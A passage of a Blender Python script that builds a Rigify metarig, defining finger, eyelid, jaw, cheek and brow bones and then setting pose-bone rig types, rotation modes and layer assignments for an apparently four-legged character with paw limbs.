bone.parent = arm.edit_bones[bones['f_pinky.02.L']]
bones['f_pinky.03.L'] = bone.name
bone = arm.edit_bones.new('f_ring.03.L')
bone.head[:] = 0.1278, -0.3200, 0.0224
bone.tail[:] = 0.1328, -0.3592, 0.0129
bone.roll = -0.9905
bone.use_connect = True
bone.parent = arm.edit_bones[bones['f_ring.02.L']]
bones['f_ring.03.L'] = bone.name
bone = arm.edit_bones.new('f_middle.03.L')
bone.head[:] = 0.0940, -0.3200, 0.0224
bone.tail[:] = 0.0902, -0.3593, 0.0129
bone.roll = 0.8084
bone.use_connect = True
bone.parent = arm.edit_bones[bones['f_middle.02.L']]
bones['f_middle.03.L'] = bone.name
bone = arm.edit_bones.new('f_index.03.L')
bone.head[:] = 0.0712, -0.3087, 0.0170
bone.tail[:] = 0.0641, -0.3283, 0.0129
bone.roll = 2.2048
bone.use_connect = True
bone.parent = arm.edit_bones[bones['f_index.02.L']]
bones['f_index.03.L'] = bone.name
bone = arm.edit_bones.new('f_pinky.03.R')
bone.head[:] = -0.1520, -0.3116, 0.0170
bone.tail[:] = -0.1544, -0.3323, 0.0129
bone.roll = 1.0952
bone.use_connect = True
bone.parent = arm.edit_bones[bones['f_pinky.02.R']]
bones['f_pinky.03.R'] = bone.name
bone = arm.edit_bones.new('f_ring.03.R')
bone.head[:] = -0.1278, -0.3200, 0.0224
bone.tail[:] = -0.1328, -0.3592, 0.0129
bone.roll = 0.9905
bone.use_connect = True
bone.parent = arm.edit_bones[bones['f_ring.02.R']]
bones['f_ring.03.R'] = bone.name
bone = arm.edit_bones.new('f_middle.03.R')
bone.head[:] = -0.0940, -0.3200, 0.0224
bone.tail[:] = -0.0902, -0.3593, 0.0129
bone.roll = -0.8084
bone.use_connect = True
bone.parent = arm.edit_bones[bones['f_middle.02.R']]
bones['f_middle.03.R'] = bone.name
bone = arm.edit_bones.new('f_index.03.R')
bone.head[:] = -0.0712, -0.3087, 0.0170
bone.tail[:] = -0.0641, -0.3283, 0.0129
bone.roll = -2.2048
bone.use_connect = True
bone.parent = arm.edit_bones[bones['f_index.02.R']]
bones['f_index.03.R'] = bone.name
bone = arm.edit_bones.new('lid.B.L.001')
bone.head[:] = 0.0382, -0.6786, 0.9040
bone.tail[:] = 0.0476, -0.6772, 0.9036
bone.roll = 0.0266
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lid.B.L']]
bones['lid.B.L.001'] = bone.name
bone = arm.edit_bones.new('lid.B.R.001')
bone.head[:] = -0.0382, -0.6786, 0.9040
bone.tail[:] = -0.0476, -0.6772, 0.9036
bone.roll = -0.0266
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lid.B.R']]
bones['lid.B.R.001'] = bone.name
bone = arm.edit_bones.new('jaw.L.001')
bone.head[:] = 0.0694, -0.6211, 0.8005
bone.tail[:] = 0.0481, -0.6715, 0.7849
bone.roll = 0.2993
bone.use_connect = True
bone.parent = arm.edit_bones[bones['jaw.L']]
bones['jaw.L.001'] = bone.name
bone = arm.edit_bones.new('jaw.R.001')
bone.head[:] = -0.0694, -0.6211, 0.8005
bone.tail[:] = -0.0481, -0.6715, 0.7849
bone.roll = -0.2993
bone.use_connect = True
bone.parent = arm.edit_bones[bones['jaw.R']]
bones['jaw.R.001'] = bone.name
bone = arm.edit_bones.new('lid.B.L.002')
bone.head[:] = 0.0476, -0.6772, 0.9036
bone.tail[:] = 0.0570, -0.6724, 0.9082
bone.roll = -0.1195
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lid.B.L.001']]
bones['lid.B.L.002'] = bone.name
bone = arm.edit_bones.new('lid.B.R.002')
bone.head[:] = -0.0476, -0.6772, 0.9036
bone.tail[:] = -0.0570, -0.6724, 0.9082
bone.roll = 0.1195
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lid.B.R.001']]
bones['lid.B.R.002'] = bone.name
bone = arm.edit_bones.new('chin.L')
bone.head[:] = 0.0481, -0.6715, 0.7849
bone.tail[:] = 0.0482, -0.6927, 0.7995
bone.roll = 3.1083
bone.use_connect = True
bone.parent = arm.edit_bones[bones['jaw.L.001']]
bones['chin.L'] = bone.name
bone = arm.edit_bones.new('chin.R')
bone.head[:] = -0.0481, -0.6715, 0.7849
bone.tail[:] = -0.0482, -0.6927, 0.7995
bone.roll = -3.1083
bone.use_connect = True
bone.parent = arm.edit_bones[bones['jaw.R.001']]
bones['chin.R'] = bone.name
bone = arm.edit_bones.new('lid.B.L.003')
bone.head[:] = 0.0570, -0.6724, 0.9082
bone.tail[:] = 0.0621, -0.6644, 0.9197
bone.roll = -0.1171
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lid.B.L.002']]
bones['lid.B.L.003'] = bone.name
bone = arm.edit_bones.new('lid.B.R.003')
bone.head[:] = -0.0570, -0.6724, 0.9082
bone.tail[:] = -0.0621, -0.6644, 0.9197
bone.roll = 0.1171
bone.use_connect = True
bone.parent = arm.edit_bones[bones['lid.B.R.002']]
bones['lid.B.R.003'] = bone.name
bone = arm.edit_bones.new('cheek.B.L')
bone.head[:] = 0.0482, -0.6927, 0.7995
bone.tail[:] = 0.0707, -0.6771, 0.8294
bone.roll = -0.1207
bone.use_connect = True
bone.parent = arm.edit_bones[bones['chin.L']]
bones['cheek.B.L'] = bone.name
bone = arm.edit_bones.new('cheek.B.R')
bone.head[:] = -0.0482, -0.6927, 0.7995
bone.tail[:] = -0.0707, -0.6771, 0.8294
bone.roll = 0.1207
bone.use_connect = True
bone.parent = arm.edit_bones[bones['chin.R']]
bones['cheek.B.R'] = bone.name
bone = arm.edit_bones.new('cheek.B.L.001')
bone.head[:] = 0.0707, -0.6771, 0.8294
bone.tail[:] = 0.0906, -0.6428, 0.9032
bone.roll = 0.0640
bone.use_connect = True
bone.parent = arm.edit_bones[bones['cheek.B.L']]
bones['cheek.B.L.001'] = bone.name
bone = arm.edit_bones.new('cheek.B.R.001')
bone.head[:] = -0.0707, -0.6771, 0.8294
bone.tail[:] = -0.0906, -0.6428, 0.9032
bone.roll = -0.0640
bone.use_connect = True
bone.parent = arm.edit_bones[bones['cheek.B.R']]
bones['cheek.B.R.001'] = bone.name
bone = arm.edit_bones.new('brow.T.L')
bone.head[:] = 0.0906, -0.6428, 0.9032
bone.tail[:] = 0.0774, -0.6567, 0.9438
bone.roll = 0.1270
bone.use_connect = True
bone.parent = arm.edit_bones[bones['cheek.B.L.001']]
bones['brow.T.L'] = bone.name
bone = arm.edit_bones.new('brow.T.R')
bone.head[:] = -0.0906, -0.6428, 0.9032
bone.tail[:] = -0.0774, -0.6567, 0.9438
bone.roll = -0.1270
bone.use_connect = True
bone.parent = arm.edit_bones[bones['cheek.B.R.001']]
bones['brow.T.R'] = bone.name
bone = arm.edit_bones.new('brow.T.L.001')
bone.head[:] = 0.0774, -0.6567, 0.9438
bone.tail[:] = 0.0510, -0.6773, 0.9561
bone.roll = -2.7274
bone.use_connect = True
bone.parent = arm.edit_bones[bones['brow.T.L']]
bones['brow.T.L.001'] = bone.name
bone = arm.edit_bones.new('brow.T.R.001')
bone.head[:] = -0.0774, -0.6567, 0.9438
bone.tail[:] = -0.0510, -0.6773, 0.9561
bone.roll = 2.7274
bone.use_connect = True
bone.parent = arm.edit_bones[bones['brow.T.R']]
bones['brow.T.R.001'] = bone.name
bone = arm.edit_bones.new('brow.T.L.002')
bone.head[:] = 0.0510, -0.6773, 0.9561
bone.tail[:] = 0.0160, -0.7017, 0.9527
bone.roll = 0.4172
bone.use_connect = True
bone.parent = arm.edit_bones[bones['brow.T.L.001']]
bones['brow.T.L.002'] = bone.name
bone = arm.edit_bones.new('brow.T.R.002')
bone.head[:] = -0.0510, -0.6773, 0.9561
bone.tail[:] = -0.0160, -0.7017, 0.9527
bone.roll = -0.4172
bone.use_connect = True
bone.parent = arm.edit_bones[bones['brow.T.R.001']]
bones['brow.T.R.002'] = bone.name
bone = arm.edit_bones.new('brow.T.L.003')
bone.head[:] = 0.0160, -0.7017, 0.9527
bone.tail[:] = 0.0000, -0.7082, 0.9031
bone.roll = -0.6706
bone.use_connect = True
bone.parent = arm.edit_bones[bones['brow.T.L.002']]
bones['brow.T.L.003'] = bone.name
bone = arm.edit_bones.new('brow.T.R.003')
bone.head[:] = -0.0160, -0.7017, 0.9527
bone.tail[:] = 0.0000, -0.7082, 0.9031
bone.roll = 0.6706
bone.use_connect = True
bone.parent = arm.edit_bones[bones['brow.T.R.002']]
bones['brow.T.R.003'] = bone.name
bpy.ops.object.mode_set(mode='OBJECT')
pbone = obj.pose.bones[bones['spine']]
pbone.rigify_type = 'spines.super_spine'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.use_tail = True
except AttributeError:
pass
try:
pbone.rigify_parameters.tail_pos = 4
except AttributeError:
pass
try:
pbone.rigify_parameters.pivot_pos = 8
except AttributeError:
pass
try:
pbone.rigify_parameters.neck_pos = 10
except AttributeError:
pass
try:
pbone.rigify_parameters.copy_rotation_axes = [True, False, True]
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_extra_layers = False
except AttributeError:
pass
try:
pbone.rigify_parameters.tweak_layers = [False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.004']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.005']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.neck_pos = 5
except AttributeError:
pass
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.006']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['pelvis.L']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_control = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['pelvis.R']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_control = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['thigh.L']]
pbone.rigify_type = 'limbs.super_limb'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.limb_type = "paw"
except AttributeError:
pass
try:
pbone.rigify_parameters.fk_layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['thigh.R']]
pbone.rigify_type = 'limbs.super_limb'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.fk_layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.limb_type = "paw"
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.007']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['shin.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['shin.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.008']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['foot.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['foot.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.009']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['shoulder.L']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_widget = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['shoulder.R']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.make_widget = False
except AttributeError:
pass
pbone = obj.pose.bones[bones['breast.L']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['breast.R']]
pbone.rigify_type = 'basic.super_copy'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'YXZ'
pbone.bone.layers = [False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['toe.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.limb_type = "paw"
except AttributeError:
pass
pbone = obj.pose.bones[bones['toe.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.limb_type = "paw"
except AttributeError:
pass
pbone = obj.pose.bones[bones['spine.010']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['front_thigh.L']]
pbone.rigify_type = 'limbs.super_limb'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.limb_type = "paw"
except AttributeError:
pass
try:
pbone.rigify_parameters.fk_layers = [False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['front_thigh.R']]
pbone.rigify_type = 'limbs.super_limb'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.limb_type = "paw"
except AttributeError:
pass
try:
pbone.rigify_parameters.fk_layers = [False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['r_palm.04.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_palm.03.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_palm.02.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_palm.01.L']]
pbone.rigify_type = 'limbs.super_palm'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_palm.04.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_palm.03.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_palm.02.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_palm.01.R']]
pbone.rigify_type = 'limbs.super_palm'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['spine.011']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['front_shin.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['front_shin.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['r_pinky.01.L']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['r_ring.01.L']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['r_middle.01.L']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['r_index.01.L']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
